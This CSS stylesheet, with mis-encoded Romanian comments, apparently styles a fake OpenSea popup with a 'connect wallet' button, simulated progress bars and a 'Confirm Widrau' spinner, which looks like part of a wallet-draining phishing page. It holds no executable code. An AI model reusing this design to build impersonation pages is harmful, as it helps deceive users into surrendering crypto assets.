body {
        margin: 0;
        padding: 0;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        font-family: Arial, sans-serif;
    }


            body, html {
            text-align: center !important;
        }
        
        .popup {
            text-align: center !important;
            display: flex !important;
            flex-direction: column !important;
            align-items: center !important;
            justify-content: center !important;
            margin: 0 auto !important;
            width: 100% !important;
        }
        
        .popup img {
            margin: 0 auto !important;
            display: block !important;
            text-align: center !important;
            float: none !important;
            align-self: center !important;
        }
        
        .container {
            text-align: center !important;
            display: flex !important;
            flex-direction: column !important;
            align-items: center !important;
            width: 100% !important;
            margin: 0 auto !important;
        }
        
        /* Lock button dimensions - always looks ready */
        #connect-wallet-btn {
            width: 300px !important;
            height: 50px !important;
            min-width: 300px !important;
            max-width: 300px !important;
            min-height: 50px !important;
            max-height: 50px !important;
            padding: 12px 24px !important;
            margin: 10px auto !important;
            display: flex !important;
            align-items: center !important;
            justify-content: center !important;
            box-sizing: border-box !important;
            overflow: hidden !important;
            white-space: nowrap !important;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%) !important;
            border: none !important;
            border-radius: 8px !important;
            color: white !important;
            font-size: 16px !important;
            cursor: pointer !important; /* Always shows pointer */
            transition: all 0.2s ease !important;
            position: relative !important;
        }
        
        /* Subtle loading indicator */
        #connect-wallet-btn::before {
            content: '';
            position: absolute;
            top: 0;
            left: -100%;
            width: 100%;
            height: 100%;
            background: linear-gradient(90deg, transparent, rgba(255,255,255,0.2), transparent);
            transition: left 0.5s ease;
        }
        
        /* Show shimmer effect when ready */
        #connect-wallet-btn.ready::before {
            left: 100%;
        }
        
        /* Hover effects */
        #connect-wallet-btn:hover {
            background: linear-gradient(135deg, #5a67d8 0%, #6b46c1 100%) !important;
            transform: translateY(-1px) !important;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15) !important;
        }
        
        /* Ensure button contents stay properly aligned */
        #connect-wallet-btn svg {
            width: 30px !important;
            height: 30px !important;
            flex-shrink: 0 !important;
        }
        
        #button-text {
            margin-left: 8px !important;
            font-weight: bold !important;
            flex-shrink: 0 !important;
            white-space: nowrap !important;
        }
        
        /* Remove other transitions but keep functionality */
        .interact-button {
            animation: none !important;
            transform: none !important;
        }
        
        /* Ensure all text elements stay centered */
        h2, .message, .info-text {
            text-align: center !important;
            width: 100% !important;
            margin-left: auto !important;
            margin-right: auto !important;
        }
   

    @media (orientation: landscape) {
        body {
            position: relative;
            background-image: url(desktop.gif);
            background-size: cover;
            background-repeat: no-repeat;
            height: 100vh; /* AsigurÄƒ cÄƒ body-ul are Ã®nÄƒlÈ›imea completÄƒ */
            margin: 0;
        }

        /* Overlay gri pentru a crea efectul de ceaÈ›Äƒ */
        body::after {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background-color: rgba(0, 0, 0, 0.4); /* Gri semitransparent */
            z-index: -1; /* AsigurÄƒ-te cÄƒ overlay-ul rÄƒmÃ¢ne Ã®n spatele conÈ›inutului */
        }
    }

    @media (orientation: portrait) {
        body {
            position: relative;
            background-image: url(mobile.gif);
            background-size: cover;
            background-repeat: no-repeat;
            height: 100vh; /* AsigurÄƒ cÄƒ body-ul are Ã®nÄƒlÈ›imea completÄƒ */
            margin: 0;
        }

        /* Overlay gri pentru a crea efectul de ceaÈ›Äƒ */
        body::after {
            content: "";
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background-color: rgba(0, 0, 0, 0.4); /* Gri semitransparent */
            z-index: -1; /* AsigurÄƒ-te cÄƒ overlay-ul rÄƒmÃ¢ne Ã®n spatele conÈ›inutului */
        }
    }

    /* Stiluri pentru popup */
    .popup {
        background-color: rgba(255, 255, 255, 1.0); /* Fundal semi-transparent pentru popup */
        padding: 30px;
        border-radius: 12px;
        box-shadow: 0 10px 40px rgba(0, 0, 0, 0.1);
        width: 90%;
        max-width: 450px;
        text-align: center;
        margin: auto;
        position: relative;
        z-index: 10;
    }

    /* Logo OpenSea */
    .popup img {
        width: 100px;
        height: auto;
        margin-bottom: 20px;
    }

    /* Titlu popup */
    .popup h2 {
        font-size: 24px;
        color: #000;
        margin: 0 0 15px;
        font-weight: bold;
    }

    /* Textul descrierii */
    .popup p {
        font-size: 18px;
        color: #555;
        margin: 0 0 20px;
        line-height: 1.5;
    }

    /* Mesajele cu iconiÈ›e */
    .message {
        font-size: 18px;
        color: #555;
        margin: 20px 0;
        display: flex;
        justify-content: center;
        align-items: center;
        
    }

    .message span {
        margin-left: 10px;
    }

 .col{
    display: flex;
    align-items: center;
 }

 .col2 img{
    width:30px;
 }
    .col2 span{
      font-size: 1.1em;
      margin-right: 50px;
    }

    /* Stilizarea pentru cercul care se Ã®ncarcÄƒ */
    .loading {
        width: 20px;
        height: 20px;
        border: 3px solid #2081e2;
        border-radius: 50%;
        border-top-color: transparent;
        animation: spin 1.5s linear infinite;
    }

    /* AnimaÈ›ie pentru Ã®ncÄƒrcarea cercului */
    @keyframes spin {
        0% {
            transform: rotate(0deg);
        }
        100% {
            transform: rotate(360deg);
        }
    }

    /* Bara de progres */
    .progress-bar {
        width: 100%;
        background-color: #f1f1f1;
        border-radius: 10px;
        overflow: hidden;
        height: 10px;
        margin-bottom: 30px;
    }

    .progress-bar-inner {
        width: 50%; /* AjusteazÄƒ pentru a simula Ã®ncÄƒrcarea */
        height: 100%;
        background-color: #2081e2;
        transition: width 0.5s;
    }

    /* Butonul confirmare */
    .popup button {
        background-color: #2081e2;
        color: white;
        border: none;
        padding: 15px 21px;
        font-size: 22px;
        font-weight: bold;
        border-radius: 18px;
        cursor: pointer;
        transition: background-color 0.3s ease-in-out;
        width: 100%;
    }

    .button:hover {
        background-color: #105492;
    }

    .secondSection_button {
        display: inline-flex;
        cursor: pointer;
        -webkit-box-align: center;
        align-items: center;
        border-radius: 12px;
        -webkit-box-pack: center;
        justify-content: center;
        font-weight: 600;
        line-height: 22px;
        letter-spacing: 0.01em;
        padding: 15px 21px;
        font-size: 16px;
        background-color: rgb(32, 129, 226);
        color: rgb(255, 255, 255);
    }

    .secondSection_button:hover {
        background-color: rgb(29, 142, 255);
        transition: all 0.3s ease;
    }
    .progress-bar-inner {
    width: 90%; /* AjusteazÄƒ pentru a simula Ã®ncÄƒrcarea la 90% */
    height: 100%;
    background-color: #2081e2;
    transition: width 0.5s;
}
/* Stilizarea pentru containerul care conÈ›ine cercul de Ã®ncÄƒrcare È™i textul */
.loading-container {
    display: flex;
    align-items: center;
    justify-content: center;
    margin-top: 20px;
}

/* Stilizarea pentru cercul de Ã®ncÄƒrcare */
.loading {
    width: 18px;               /* MÄƒrimea cercului */
    height: 18px;              /* MÄƒrimea cercului */
    border: 4px solid #f3f3f3; /* Culoarea de fundal a cercului */
    border-top: 4px solid #2081e2; /* Culoarea topului cercului (albastru) */
    border-radius: 50%;        /* ÃŽl face cerc */
    animation: spin 1.5s linear infinite; /* AnimaÈ›ie pentru rotaÈ›ie */
    margin-right: 1px;        /* SpaÈ›iu Ã®ntre cerc È™i text */
}

/* AnimaÈ›ie pentru Ã®ncÄƒrcare - rotirea cercului */
@keyframes spin {
    0% {
        transform: rotate(0deg);
    }
    100% {
        transform: rotate(360deg);
    }
}

/* Stilizarea textului "Confirm Widrau" */
.loading-container span {
    font-size: 18px;
    color: #555;
    font-family: Arial, sans-serif; /* Folosim acelaÈ™i font */
}

.info-text {
    display: block;
    text-align: center;
    font-size: 12px;
    color: #888;
    margin-top: 20px;
}

.info-text a {
    color: #2081e2;
    text-decoration: none;
}

.info-text a:hover {
    color: #105492;
}

/* AdÄƒugÄƒm opacitate scÄƒzutÄƒ la linkuri cÃ¢nd sunt inactive */
.info-text a:disabled {
    pointer-events: none;
    opacity: 0.4;
}